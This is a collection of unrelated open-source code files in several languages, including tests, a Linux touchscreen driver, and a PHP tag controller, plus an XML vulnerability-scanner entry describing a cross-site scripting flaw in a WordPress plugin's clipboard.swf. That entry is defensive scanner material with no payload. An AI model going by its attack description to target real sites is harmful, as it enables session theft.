bufferOriginalPtr->startPC(%d) != lineNumber.location(%d) || bufferOriginalPtr->lineNumber(%d) != lineNumber.lineNumber(%d)",
bufferOriginalPtr->startPC, lineNumber.location, bufferOriginalPtr->lineNumber, lineNumber.lineNumber );
}
bufferOriginalPtr++;
}
}
j9mem_free_memory(bufferOriginal);
j9mem_free_memory(bufferCompressed);
return reportTestExit(PORTLIB, testName);
}
IDATA
j9dyn_lineNumber_tests(J9PortLibrary *portLib, int randomSeed)
{
PORT_ACCESS_FROM_PORT(portLib);
IDATA rc = 0;
HEADING(PORTLIB, "j9dyn_lineNumber_tests");
if (0 == randomSeed) {
randomSeed = (int) j9time_current_time_millis();
}
outputComment(portLib, "NOTE: Run 'dyntest -srand:%d' to reproduce this test manually.\n\n", randomSeed);
srand(randomSeed);
rc |= testLineNumberCompressionEdge(portLib, "testLineNumberCompressionEdge: 0 , 0x1F , 0 , 3 , 3 ", 0 , 0x1F , 0 , 3 , 3);
rc |= testLineNumberCompressionEdge(portLib, "testLineNumberCompressionEdge: 0 , 0x1F , -256 , 0xFF , 1786 ", 0 , 0x1F , -256 , 0xFF , 1786);
rc |= testLineNumberCompressionEdge(portLib, "testLineNumberCompressionEdge: 0 , 0x7F , -8192 , 0x1FFF, 65533", 0 , 0x7F , -8192 , 0x1FFF, 65533);
rc |= testLineNumberCompressionEdge(portLib, "testLineNumberCompressionEdge: 0x80 , 0x100 , 0x2000, 0x4000, 40960", 0x80 , 0x100 , 0x2000, 0x4000, 40960);
rc |= testLineNumberCompressionEdge(portLib, "testLineNumberCompressionEdge: 0x80 , 0x100 , -10192, -8193 , 9995 ", 0x80 , 0x100 , -10192, -8193 , 9995);
rc |= testLineNumberCompressionEdge(portLib, "testLineNumberCompressionEdge: 0xBFFF, 0xFFFF, 0xBFFF, 0xFFFF, 81920", 0xBFFF, 0xFFFF, 0xBFFF, 0xFFFF, 81920);
rc |= testLineNumberCompressionEdge(portLib, "testLineNumberCompressionEdge: 0xBFFF, 0xFFFF, -65535, -49150, 81925", 0xBFFF, 0xFFFF, -65535, -49150, 81925);
rc |= testLineNumberCompressionDeltaEncoding(portLib, "testLineNumberCompressionDeltaEncoding: 0, 0xFFFF, 1 ", 0, 0xFFFF, 1 );
rc |= testLineNumberCompressionDeltaEncoding(portLib, "testLineNumberCompressionDeltaEncoding: 0xFFFF, 0, -1 ", 0xFFFF, 0, - 1 );
rc |= testLineNumberCompressionDeltaEncoding(portLib, "testLineNumberCompressionDeltaEncoding: 0, 0xFFFF, 15 ", 0, 0xFFFF, 15 );
rc |= testLineNumberCompressionDeltaEncoding(portLib, "testLineNumberCompressionDeltaEncoding: 0xFFFF, 0, -15", 0xFFFF, 0, -15);
rc |= testLineNumberCompressionNegativeOffsetError(portLib, "testLineNumberCompressionNegativeOffsetError");
rc |= testLineNumberRandomCompressionDecompression(portLib, "testLineNumberRandomCompressionDecompression");
return rc;
}
| {
"pile_set_name": "Github"
} |
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace HearthstoneAI.State
{
public class EntityChoice
{
public EntityChoice()
{
choices = new Dictionary<int, int>();
choices_has_sent = false;
sent_choices = new List<int>();
}
public int id;
public string choice_type;
public int player_entity_id;
public string player_entity_str;
public string source;
public Dictionary<int, int> choices;
public bool choices_has_sent;
public List<int> sent_choices;
}
}
| {
"pile_set_name": "Github"
} |
// +build go1.8
package websocket
import (
"crypto/tls"
"net/http/httptrace"
)
func doHandshakeWithTrace(trace *httptrace.ClientTrace, tlsConn *tls.Conn, cfg *tls.Config) error {
if trace.TLSHandshakeStart != nil {
trace.TLSHandshakeStart()
}
err := doHandshake(tlsConn, cfg)
if trace.TLSHandshakeDone != nil {
trace.TLSHandshakeDone(tlsConn.ConnectionState(), err)
}
return err
}
| {
"pile_set_name": "Github"
} |
package org.zstack.portal.managementnode;
import org.springframework.web.context.support.WebApplicationContextUtils;
import org.zstack.core.CoreGlobalProperty;
import org.zstack.core.Platform;
import org.zstack.core.cloudbus.CloudBus;
import org.zstack.header.exception.CloudRuntimeException;
import org.zstack.utils.BootErrorLog;
import org.zstack.utils.ExceptionDSL;
import org.zstack.utils.Utils;
import org.zstack.utils.logging.CLogger;
import javax.servlet.ServletContextEvent;
import javax.servlet.ServletContextListener;
import static org.zstack.utils.ExceptionDSL.throwableSafe;
public class ComponentLoaderWebListener implements ServletContextListener {
private static final CLogger logger = Utils.getLogger(ComponentLoaderWebListener.class);
private static boolean isInit = false;
private ManagementNodeManager node;
private CloudBus bus;
@Override
public void contextDestroyed(ServletContextEvent arg0) {
logger.warn("web listener issued context destroy event, start stopping process");
if (isInit) {
throwableSafe(new Runnable() {
@Override
public void run() {
node.stop();
}
});
}
}
@Override
public void contextInitialized(ServletContextEvent event) {
try {
if (!isInit) {
Platform.createComponentLoaderFromWebApplicationContext(WebApplicationContextUtils.getWebApplicationContext(event.getServletContext()));
node = Platform.getComponentLoader().getComponent(ManagementNodeManager.class);
bus = Platform.getComponentLoader().getComponent(CloudBus.class);
node.startNode();
isInit = true;
}
} catch (Throwable t) {
logger.warn("failed to start management server", t);
// have to call bus.stop() because its init has been called by spring
if (bus != null) {
bus.stop();
}
Throwable root = ExceptionDSL.getRootThrowable(t);
new BootErrorLog().write(root.getMessage());
if (CoreGlobalProperty.EXIT_JVM_ON_BOOT_FAILURE) {
System.exit(1);
} else {
throw new CloudRuntimeException(t);
}
}
}
}
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?>
<WebApplicationTest>
<TestDescription name="Cross site scripting vulnerability in clipboard.swf" version="0.1" released="20080307" updated="20140314" protocol="FTP" mayproxy="false" affects="server" severity="high" alert="success" type="Configuration">
<WASPDescription BindAlertToFile="0" CrawlerProcessingMode="ParseOnly" TargetFormat="" Target="" ModuleName="" Request="" Response="" FullResponse="" DetailsFormat="" Details="" AuthType="0" AuthName="" AuthPass="" CompInfo="" DetaliedInformation="" AlertTags="xss" CVE="" CWE="CWE-79" CVSSVer="2.0" CVSSScore="4.4" CVSSDescr="AV:N/AC:M/Au:N/C:N/I:P/A:N/E:POC/RL:OF/RC:C" CVSSScoreTemp="" CVSSScoreEnv="" CVSS3Descr="CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"></WASPDescription>
<Copyright></Copyright>
<Description>A vulnerability has been reported in the SyntaxHighlighter Evolved plugin for WordPress, which can be exploited by malicious people to conduct cross-site scripting attacks. [break][break]
Certain unspecified input related to syntaxhighlighter2/scripts/clipboard.swf is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.[break][break]
The vulnerability is reported in versions prior to 3.1.6.</Description>
<ApplicableTo>
<Platform>
<OS>*</OS>
<Arch>*</Arch>
</Platform>
<WebServer>*</WebServer>
<ApplicationServer>*</ApplicationServer>
</ApplicableTo>
<Impact>Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable application to fool a user in order to gather data from them.
An attacker can steal the session cookie and take over the account, impersonating the user.
It is also possible to modify the content of the page presented to the user.</Impact>
<Recommendation>Update to version 3.1.6.</Recommendation>
<Reference database="WordPress SyntaxHighlighter Evolved Plugin clipboard.swf Cross-Site Scripting Vulnerability" URL="http://secunia.com/advisories/53235/"></Reference>
</TestDescription>
</WebApplicationTest> | {
"pile_set_name": "Github"
} |
/*
* Sahara TouchIT-213 serial touchscreen driver
*
* Copyright (c) 2007-2008 Claudio Nieder <[email protected]>
*
* Based on Touchright driver (drivers/input/touchscreen/touchright.c)
* Copyright (c) 2006 Rick Koch <[email protected]>
* Copyright (c) 2004 Vojtech Pavlik
* and Dan Streetman <[email protected]>
*/
/*
* This program is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License version 2 as published
* by the Free Software Foundation.
*/
#include <linux/errno.h>
#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/slab.h>
#include <linux/input.h>
#include <linux/serio.h>
#include <linux/init.h>
#define DRIVER_DESC "Sahara TouchIT-213 serial touchscreen driver"
MODULE_AUTHOR("Claudio Nieder <[email protected]>");
MODULE_DESCRIPTION(DRIVER_DESC);
MODULE_LICENSE("GPL");
/*
* Definitions & global arrays.
*/
/*
* Data is received through COM1 at 9600bit/s,8bit,no parity in packets
* of 5 byte each.
*
* +--------+ +--------+ +--------+ +--------+ +--------+
* |1000000p| |0xxxxxxx| |0xxxxxxx| |0yyyyyyy| |0yyyyyyy|
* +--------+ +--------+ +--------+ +--------+ +--------+
* MSB LSB MSB LSB
*
* The value of p is 1 as long as the screen is touched and 0 when
* reporting the location where touching stopped, e.g. where the pen was
* lifted from the screen.
*
* When holding the screen in landscape mode as the BIOS text output is
* presented, x is the horizontal axis with values growing from left to
* right and y is the vertical axis with values growing from top to
* bottom.
*
* When holding the screen in portrait mode with the Sahara logo in its
* correct position, x ist the vertical axis with values growing from
* top to bottom and y is the horizontal axis with values growing from
* right to left.
*/
#define T213_FORMAT_TOUCH_BIT 0x01
#define T213_FORMAT_STATUS_BYTE 0x80
#define T213_FORMAT_STATUS_MASK ~T213_FORMAT_TOUCH_BIT
/*
* On my Sahara Touch-IT 213 I have observed x values from 0 to 0x7f0
* and y values from 0x1d to 0x7e9, so the actual measurement is
* probably done with an 11 bit precision.
*/
#define T213_MIN_XC 0
#define T213_MAX_XC 0x07ff
#define T213_MIN_YC 0
#define T213_MAX_YC 0x07ff
/*
* Per-touchscreen data.
*/
struct touchit213 {
struct input_dev *dev;
struct serio *serio;
int idx;
unsigned char csum;
unsigned char data[5];
char phys[32];
};
static irqreturn_t touchit213_interrupt(struct serio *serio,
unsigned char data, unsigned int flags)
{
struct touchit213 *touchit213 = serio_get_drvdata(serio);
struct input_dev *dev = touchit213->dev;
touchit213->data[touchit213->idx] = data;
switch (touchit213->idx++) {
case 0:
if ((touchit213->data[0] & T213_FORMAT_STATUS_MASK) !=
T213_FORMAT_STATUS_BYTE) {
pr_debug("unsynchronized data: 0x%02x\n", data);
touchit213->idx = 0;
}
break;
case 4:
touchit213->idx = 0;
input_report_abs(dev, ABS_X,
(touchit213->data[1] << 7) | touchit213->data[2]);
input_report_abs(dev, ABS_Y,
(touchit213->data[3] << 7) | touchit213->data[4]);
input_report_key(dev, BTN_TOUCH,
touchit213->data[0] & T213_FORMAT_TOUCH_BIT);
input_sync(dev);
break;
}
return IRQ_HANDLED;
}
/*
* touchit213_disconnect() is the opposite of touchit213_connect()
*/
static void touchit213_disconnect(struct serio *serio)
{
struct touchit213 *touchit213 = serio_get_drvdata(serio);
input_get_device(touchit213->dev);
input_unregister_device(touchit213->dev);
serio_close(serio);
serio_set_drvdata(serio, NULL);
input_put_device(touchit213->dev);
kfree(touchit213);
}
/*
* touchit213_connect() is the routine that is called when someone adds a
* new serio device that supports the Touchright protocol and registers it as
* an input device.
*/
static int touchit213_connect(struct serio *serio, struct serio_driver *drv)
{
struct touchit213 *touchit213;
struct input_dev *input_dev;
int err;
touchit213 = kzalloc(sizeof(struct touchit213), GFP_KERNEL);
input_dev = input_allocate_device();
if (!touchit213 || !input_dev) {
err = -ENOMEM;
goto fail1;
}
touchit213->serio = serio;
touchit213->dev = input_dev;
snprintf(touchit213->phys, sizeof(touchit213->phys),
"%s/input0", serio->phys);
input_dev->name = "Sahara Touch-iT213 Serial TouchScreen";
input_dev->phys = touchit213->phys;
input_dev->id.bustype = BUS_RS232;
input_dev->id.vendor = SERIO_TOUCHIT213;
input_dev->id.product = 0;
input_dev->id.version = 0x0100;
input_dev->dev.parent = &serio->dev;
input_dev->evbit[0] = BIT_MASK(EV_KEY) | BIT_MASK(EV_ABS);
input_dev->keybit[BIT_WORD(BTN_TOUCH)] = BIT_MASK(BTN_TOUCH);
input_set_abs_params(touchit213->dev, ABS_X,
T213_MIN_XC, T213_MAX_XC, 0, 0);
input_set_abs_params(touchit213->dev, ABS_Y,
T213_MIN_YC, T213_MAX_YC, 0, 0);
serio_set_drvdata(serio, touchit213);
err = serio_open(serio, drv);
if (err)
goto fail2;
err = input_register_device(touchit213->dev);
if (err)
goto fail3;
return 0;
fail3: serio_close(serio);
fail2: serio_set_drvdata(serio, NULL);
fail1: input_free_device(input_dev);
kfree(touchit213);
return err;
}
/*
* The serio driver structure.
*/
static struct serio_device_id touchit213_serio_ids[] = {
{
.type = SERIO_RS232,
.proto = SERIO_TOUCHIT213,
.id = SERIO_ANY,
.extra = SERIO_ANY,
},
{ 0 }
};
MODULE_DEVICE_TABLE(serio, touchit213_serio_ids);
static struct serio_driver touchit213_drv = {
.driver = {
.name = "touchit213",
},
.description = DRIVER_DESC,
.id_table = touchit213_serio_ids,
.interrupt = touchit213_interrupt,
.connect = touchit213_connect,
.disconnect = touchit213_disconnect,
};
/*
* The functions for inserting/removing us as a module.
*/
static int __init touchit213_init(void)
{
return serio_register_driver(&touchit213_drv);
}
static void __exit touchit213_exit(void)
{
serio_unregister_driver(&touchit213_drv);
}
module_init(touchit213_init);
module_exit(touchit213_exit);
| {
"pile_set_name": "Github"
} |
package net.ripe.db.whois.common.support;
import org.hamcrest.BaseMatcher;
import org.hamcrest.Description;
import java.util.Arrays;
public class ByteArrayContains extends BaseMatcher<byte[]> {
private byte[] needle;
public ByteArrayContains(byte[] needle) {
this.needle = needle;
}
public static final int indexOf(byte[] haystack, byte[] needle) {
return indexOf(haystack, needle, 0);
}
/* Searches through haystack, returns index of first occurence of needle */
public static final int indexOf(byte[] haystack, byte[] needle, int frompos) {
int lengthDiff = haystack.length - frompos - needle.length;
if (lengthDiff < 0) {
return -1;
}
outer:
for (int i = frompos; i <= lengthDiff; i++) {
for (int j = 0; j < needle.length; j++) {
if (haystack[i + j] != needle[j]) {
continue outer;
}
}
return i;
}
return -1;
}
/* Searches through haystack, returns index of first occurence of needle,
* while ignoring ignoredChars from haystack */
public static final int indexOfIgnoring(byte[] haystack, byte[] needle, int frompos, byte[] ignoredChars) {
int lastMatch = haystack.length - needle.length;
if (lastMatch < frompos) {
return -1;
}
int hayind = frompos;
int haymatch = frompos;
int needind = 0;
outer:
while (hayind <= lastMatch) {
// check if ignored char
for (byte ignoredChar : ignoredChars) {
if (haystack[hayind] == ignoredChar) {
hayind++;
continue outer;
}
}
// check if the next char in needle matches haystack
if (haystack[hayind] == needle[needind]) {
needind++;
// check if reached end if needle
if (needind >= needle.length) {
return haymatch;
}
} else { // reset counters
needind = 0;
haymatch = hayind + 1;
}
hayind++;
}
return -1;
}
@Override
public boolean matches(Object haystack) {
return indexOf((byte[]) haystack, needle) >= 0;
}
@Override
public void describeTo(Description description) {
description.appendText("contains(" + Arrays.toString(needle) + ")");
}
}
| {
"pile_set_name": "Github"
} |
using System;
using System.Collections.Generic;
using System.Linq;
using System.Linq.Expressions;
using System.Threading.Tasks;
using Xunit;
namespace X.PagedList.Tests
{
public class PagedListFacts
{
//[Fact]
//public void Null_Data_Set_Doesnt_Throw_Exception()
//{
// //act
// Assert.ThrowsDelegate act = () => new PagedList<object>(null, 1, 10);
// //assert
// Assert.DoesNotThrow(act);
//}
[Fact]
public void PageNumber_Below_One_Throws_ArgumentOutOfRange()
{
//arrange
var data = new[] { 1, 2, 3 };
//act
Action action = () => data.ToPagedList(0, 1);
//assert
Assert.Throws<ArgumentOutOfRangeException>(action);
}
[Fact]
public async Task Argument_out_of_range()
{
var queryable = (new List<Object>()).AsQueryable();
var list = await queryable.ToListAsync();
var pagedList = list.ToPagedList();
Assert.NotNull(pagedList);
}
[Fact]
public void Split_Works()
{
//arrange
var list = Enumerable.Range(1, 47);
//act
var splitList = list.Split(5).ToList();
//assert
Assert.Equal(5, splitList.Count());
Assert.Equal(10, splitList.ElementAt(0).Count());
Assert.Equal(10, splitList.ElementAt(1).Count());
Assert.Equal(10, splitList.ElementAt(2).Count());
Assert.Equal(10, splitList.ElementAt(3).Count());
Assert.Equal(7, splitList.ElementAt(4).Count());
}
[Fact]
public void Key_Selector_Works()
{
var collection = Enumerable.Range(1, 1000000);
var pageNumber = 2;
var pageSize = 10;
Expression<Func<int, int>> keySelector = i => Order(i);
var list = collection.ToPagedList(keySelector, pageNumber, pageSize);
Assert.Equal(22, list.ElementAt(0));
Assert.Equal(24, list.ElementAt(1));
Assert.Equal(26, list.ElementAt(2));
Assert.Equal(28, list.ElementAt(3));
Assert.Equal(30, list.ElementAt(4));
Assert.Equal(32, list.ElementAt(5));
Assert.Equal(34, list.ElementAt(6));
Assert.Equal(36, list.ElementAt(7));
Assert.Equal(38, list.ElementAt(8));
Assert.Equal(40, list.ElementAt(9));
}
private static int Order(int i)
{
//
return i % 2 == 0 ? 1 : 10;
}
[Fact]
public void PageNumber_Above_RecordCount_Returns_Empty_List()
{
//arrange
var data = new[] { 1, 2, 3 };
//act
var pagedList = data.ToPagedList(2, 3);
//assert
Assert.Equal(0, pagedList.Count);
}
[Fact]
public void PageSize_Below_One_Throws_ArgumentOutOfRange()
{
//arrange
var data = new[] {1, 2, 3};
//act
Action action = () => data.ToPagedList(1, 0);
//assert
Assert.Throws<ArgumentOutOfRangeException>(action);
}
[Fact]
public void Null_Data_Set_Doesnt_Return_Null()
{
//act
var pagedList = new PagedList<object>(null, 1, 10);
//assert
Assert.NotNull(pagedList);
}
[Fact]
public void Null_Data_Set_Returns_Zero_Pages()
{
//act
var pagedList = new PagedList<object>(null, 1, 10);
//assert
Assert.Equal(0, pagedList.PageCount);
}
[Fact]
public void Zero_Item_Data_Set_Returns_Zero_Pages()
{
//arrange
var data = new List<object>();
//act
var pagedList = data.ToPagedList(1, 10);
//assert
Assert.Equal(0, pagedList.PageCount);
}
[Fact]
public void DataSet_Of_One_Through_Five_PageSize_Of_Two_PageNumber_Of_Two_First_Item_Is_Three()
{
//arrange
var data = new[] { 1, 2, 3, 4, 5 };
//act
var pagedList = data.ToPagedList(2, 2);
//assert
Assert.Equal(3, pagedList[0]);
}
[Fact]
public void TotalCount_Is_Preserved()
{
//arrange
var data = new[] { 1, 2, 3, 4, 5 };
//act
var pagedList = data.ToPagedList(2, 2);
//assert
Assert.Equal(5, pagedList.TotalItemCount);
}
[Fact]
public void PageSize_Is_Preserved()
{
//arrange
var data = new[] { 1, 2, 3, 4, 5 };
//act
var pagedList = data.ToPagedList(2, 2);
//assert
Assert.Equal(2, pagedList.PageSize);
}
[Fact]
public void Data_Is_Filtered_By_PageSize()
{
//arrange
var data = new[] { 1, 2, 3, 4, 5 };
//act
var pagedList = data.ToPagedList(2, 2);
//assert
Assert.Equal(2, pagedList.Count);
//### related test below
//act
pagedList = data.ToPagedList(3, 2);
//assert
Assert.Equal(1, pagedList.Count);
}
[Fact]
public void DataSet_OneThroughSix_PageSize_Three_PageNumber_One_FirstValue_Is_One()
{
//arrange
var data = new[] { 1, 2, 3, 4, 5, 6 };
//act
var pagedList = data.ToPagedList(1, 3);
//assert
Assert.Equal(1, pagedList[0]);
}
[Fact]
public void DataSet_OneThroughThree_PageSize_One_PageNumber_Three_HasNextPage_False()
{
//arrange
var data = new[] { 1, 2, 3 };
//act
var pagedList1 = data.ToPagedList(2, 1);
var pagedList2 = data.ToPagedList(3, 1);
var pagedList3 = data.ToPagedList(4, 1);
//assert
Assert.True(pagedList1.HasNextPage);
Assert.False(pagedList2.HasNextPage);
Assert.False(pagedList3.HasNextPage);
}
[Fact]
public void DataSet_OneThroughThree_PageSize_One_PageNumber_Three_IsLastPage_True()
{
//arrange
var data = new[] { 1, 2, 3 };
//act
var pagedList1 = data.ToPagedList(2, 1);
var pagedList2 = data.ToPagedList(3, 1);
var pagedList3 = data.ToPagedList(4, 1);
//assert
Assert.False(pagedList1.IsLastPage);
Assert.True(pagedList2.IsLastPage);
Assert.False(pagedList3.IsLastPage);
}
[Fact]
public void DataSet_OneAndTwo_PageSize_One_PageNumber_Two_FirstValue_Is_Two()
{
//arrange
var data = new[] { 1, 2 };
//act
var pagedList = data.ToPagedList(2, 1);
//assert
Assert.Equal(2, pagedList[0]);
}
[Fact]
public void DataSet_OneThroughTen_PageSize_Five_PageNumber_One_FirstItemOnPage_Is_One()
{
//arrange
var data = Enumerable.Range(1, 10);
//act
var pagedList = data.ToPagedList(1, 5);
//assert
Assert.Equal(1, pagedList.FirstItemOnPage);
}
[Fact]
public void DataSet_OneThroughTen_PageSize_Five_PageNumber_Two_FirstItemOnPage_Is_Six()
{
//arrange
var data = Enumerable.Range(1, 10);
//act
var pagedList = data.ToPagedList(2, 5);
//assert
Assert.Equal(6, pagedList.FirstItemOnPage);
}
[Fact]
public void DataSet_OneThroughTen_PageSize_Five_PageNumber_One_LastItemOnPage_Is_Five()
{
//arrange
var data = Enumerable.Range(1, 10);
//act
var pagedList = data.ToPagedList(1, 5);
//assert
Assert.Equal(5, pagedList.LastItemOnPage);
}
[Fact]
public void DataSet_OneThroughTen_PageSize_Five_PageNumber_Two_LastItemOnPage_Is_Ten()
{
//arrange
var data = Enumerable.Range(1, 10);
//act
var pagedList = data.ToPagedList(2, 5);
//assert
Assert.Equal(10, pagedList.LastItemOnPage);
}
[Fact]
public void DataSet_OneThroughEight_PageSize_Five_PageNumber_Two_LastItemOnPage_Is_Eight()
{
//arrange
var data = Enumerable.Range(1, 8);
//act
var pagedList = data.ToPagedList(2, 5);
//assert
Assert.Equal(8, pagedList.LastItemOnPage);
}
[Theory]
[InlineData(new[] { 1, 2, 3 }, 1, 1, false, true)]
[InlineData(new[] { 1, 2, 3 }, 2, 1, true, true)]
[InlineData(new[] { 1, 2, 3 }, 3, 1, true, false)]
[InlineData(new[] { 1, 2, 3 }, 1, 3, false, false)]
[InlineData(new[] { 1, 2, 3 }, 2, 3, false, false)]
[InlineData(new int[] {}, 1, 3, false, false)]
public void Theory_HasPreviousPage_And_HasNextPage_Are_Correct(int[] integers, int pageNumber, int pageSize,
bool expectedHasPrevious, bool expectedHasNext)
{
//arrange
var data = integers;
//act
var pagedList = data.ToPagedList(pageNumber, pageSize);
//assert
Assert.Equal(expectedHasPrevious, pagedList.HasPreviousPage);
Assert.Equal(expectedHasNext, pagedList.HasNextPage);
}
[Theory]
[InlineData(new[] { 1, 2, 3 }, 1, 1, true, false)]
[InlineData(new[] { 1, 2, 3 }, 2, 1, false, false)]
[InlineData(new[] { 1, 2, 3 }, 3, 1, false, true)]
[InlineData(new[] { 1, 2, 3 }, 1, 3, true, true)] // Page 1 of 1
[InlineData(new[] { 1, 2, 3 }, 2, 3, false, false)] // Page 2 of 1
[InlineData(new int[] {}, 1, 3, false, false)] // Page 1 of 0
public void Theory_IsFirstPage_And_IsLastPage_Are_Correct(int[] integers, int pageNumber, int pageSize,
bool expectedIsFirstPage, bool expectedIsLastPage)
{
//arrange
var data = integers;
//act
var pagedList = data.ToPagedList(pageNumber, pageSize);
//assert
Assert.Equal(expectedIsFirstPage, pagedList.IsFirstPage);
Assert.Equal(expectedIsLastPage, pagedList.IsLastPage);
}
[Theory]
[InlineData(new[] { 1, 2, 3 }, 1, 3)]
[InlineData(new[] { 1, 2, 3 }, 3, 1)]
[InlineData(new[] { 1 }, 1, 1)]
[InlineData(new[] { 1, 2, 3 }, 2, 2)]
[InlineData(new[] { 1, 2, 3, 4 }, 2, 2)]
[InlineData(new[] { 1, 2, 3, 4, 5 }, 2, 3)]
[InlineData(new int[] {}, 1, 0)]
public void Theory_PageCount_Is_Correct(int[] integers, int pageSize, int expectedNumberOfPages)
{
//arrange
var data = integers;
//act
var pagedList = data.ToPagedList(1, pageSize);
//assert
Assert.Equal(expectedNumberOfPages, pagedList.PageCount);
}
[Fact]
public void PageCount_Is_Correct_Big()
{
//arrange
var data = Enumerable.Range(1, 100001).ToArray();
//act
var pagedList = data.ToPagedList(1, 100000);
//assert
Assert.Equal(2, pagedList.PageCount);
}
[Theory]
[InlineData(new[] { 1, 2, 3, 4, 5 }, 1, 2, 1, 2)]
[InlineData(new[] { 1, 2, 3, 4, 5 }, 2, 2, 3, 4)]
[InlineData(new[] { 1, 2, 3, 4, 5 }, 3, 2, 5, 5)]
[InlineData(new[] { 1, 2, 3, 4, 5 }, 4, 2, 0, 0)]
[InlineData(new int[] {}, 1, 2, 0, 0)]
public void Theory_FirstItemOnPage_And_LastItemOnPage_Are_Correct(int[] integers, int pageNumber, int pageSize, int expectedFirstItemOnPage, int expectedLastItemOnPage)
{
//arrange
var data = integers;
//act
var pagedList = data.ToPagedList(pageNumber, pageSize);
//assert
Assert.Equal(expectedFirstItemOnPage, pagedList.FirstItemOnPage);
Assert.Equal(expectedLastItemOnPage, pagedList.LastItemOnPage);
}
}
} | {
"pile_set_name": "Github"
} |
// Copyright 2019 Unknwon
//
// Licensed under the Apache License, Version 2.0 (the "License"): you may
// not use this file except in compliance with the License. You may obtain
// a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
// WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
// License for the specific language governing permissions and limitations
// under the License.
package ini
import (
"bytes"
"fmt"
"io"
"io/ioutil"
"os"
)
var (
_ dataSource = (*sourceFile)(nil)
_ dataSource = (*sourceData)(nil)
_ dataSource = (*sourceReadCloser)(nil)
)
// dataSource is an interface that returns object which can be read and closed.
type dataSource interface {
ReadCloser() (io.ReadCloser, error)
}
// sourceFile represents an object that contains content on the local file system.
type sourceFile struct {
name string
}
func (s sourceFile) ReadCloser() (_ io.ReadCloser, err error) {
return os.Open(s.name)
}
// sourceData represents an object that contains content in memory.
type sourceData struct {
data []byte
}
func (s *sourceData) ReadCloser() (io.ReadCloser, error) {
return ioutil.NopCloser(bytes.NewReader(s.data)), nil
}
// sourceReadCloser represents an input stream with Close method.
type sourceReadCloser struct {
reader io.ReadCloser
}
func (s *sourceReadCloser) ReadCloser() (io.ReadCloser, error) {
return s.reader, nil
}
func parseDataSource(source interface{}) (dataSource, error) {
switch s := source.(type) {
case string:
return sourceFile{s}, nil
case []byte:
return &sourceData{s}, nil
case io.ReadCloser:
return &sourceReadCloser{s}, nil
default:
return nil, fmt.Errorf("error parsing data source: unknown type %q", s)
}
}
| {
"pile_set_name": "Github"
} |
@array = qw/one two three/;
pop @array;
@ar<caret>ray; | {
"pile_set_name": "Github"
} |
<?php
/**
* Abstract Tag Controller.
*
* @category Anahita
*
* @author Rastin Mehr <[email protected]>
* @copyright 2008 - 2015 rmdStudio Inc.
* @license GNU GPLv3 <http://www.gnu.org/licenses/gpl-3.0.html>
*
* @link http://www.GetAnahita.com
*/
abstract class ComTagsControllerAbstract extends ComBaseControllerService
{
/**
* Constructor.
*
* @param AnConfig $config An optional AnConfig object with configuration options.
*/
public function __construct(AnConfig $config)
{
parent::__construct($config);
$this->registerCallback(array(
'after.delete',
'after.add', ),
array($this, 'redirect'));
}
/**
* Initializes the options for the object.
*
* Called from {@link __construct()} as a first step of object instantiation.
*
* @param object An optional AnConfig object with configuration options.
*/
protected function _initialize(AnConfig $config)
{
$config->append(array(
'request' => array(
'scope' => '',
'sort' => 'trending',
'days' => AnRequest::get('get.days', 'int', 7),
),
));
parent::_initialize($config);
$this->getService('anahita:language')->load('com_tags');
}
/**
* Read Service.
*
* @param AnCommandContext $context
*/
protected function _actionRead(AnCommandContext $context)
{
$pkg = $this->getIdentifier()->package;
$name = $this->getIdentifier()->name;
$this->getToolbar('menubar')->setTitle(sprintf(AnTranslator::_('COM-'.$pkg.'-TERM'), $name));
$entity = parent::_actionRead($context);
if ($this->scope) {
$entity->taggables->scope($this->scope);
}
$alias = $entity
->taggables
->getRepository()
->getResources()
->main()
->getAlias();
if ($this->sort == 'top') {
$conditions = '(COALESCE(:alias.comment_count,0) + COALESCE(:alias.vote_up_count,0) + COALESCE(:alias.subscriber_count,0) + COALESCE(:alias.follower_count,0))';
$conditions = str_replace(':alias', $alias, $conditions);
$entity->taggables->order($conditions, 'DESC')->groupby('@col(taggable.id)');
} else {
$entity->taggables->order($alias.'.created_on', 'DESC');
}
$entity->taggables->limit($this->limit, $this->start);
// error_log(str_replace('#_', 'jos', $entity->taggables->getQuery()));
return $entity;
}
/**
* Browse Service.
*
* @param AnCommandContext $context
*/
protected function _actionBrowse(AnCommandContext $context)
{
$entities = parent::_actionBrowse($context);
if(in_array($this->sort, array('top', 'trending')) && $this->q == '') {
$package = $this->getIdentifier()->package;
$entities->select('COUNT(*) AS count')
->join('RIGHT', 'edges AS edge', '@col(id) = edge.node_a_id')
->where('edge.type', 'LIKE', '%com:'.$package.'.domain.entity.tag')->group('@col(id)')
->order('count', 'DESC');
if ($this->sort == 'trending') {
$now = new AnDate();
$entities->where('edge.created_on', '>', $now->addDays(-(int) $this->days)->getDate());
}
}
return $entities;
}
/**
* Set the default Tag View.
*
* @param AnCommandContext $context Context parameter
*
* @return ComTagsControllerDefault
*/
public function setView($view)
{
parent::setView($view);
if (!$this->_view instanceof ComBaseViewAbstract) {
$name = AnInflector::isPlural($this->view) ? 'tags' : 'tag';
$defaults[] = 'ComTagsView'.ucfirst($view).ucfirst($this->_view->name);
$defaults[] = 'ComTagsView'.ucfirst($name).ucfirst($this->_view->name);
register_default(array('identifier' => $this->_view, 'default' => $defaults));
}
return $this;
}
/**
* Set the necessary redirect.
*
* @param AnCommandContext $context
*/
public function redirect(AnCommandContext $context)
{
$url = array();
$url['view'] = AnInflector::pluralize($this->getIdentifier()->name);
$url['option'] = $this->getIdentifier()->package;
if ($context->action == 'add') {
$url['id'] = $this->getItem()->id;
}
$this->getResponse()->setRedirect(route($url));
}
/**
* Method to fetch the taggable object
*
*
*/
public function fetchTaggable(AnCommandContext $context)
{
$this->taggable = AnService::get('repos:nodes.node')
->getQuery()
->disableChain()
->id($this->taggable_id)
->fetch();
if(!$this->taggable) {
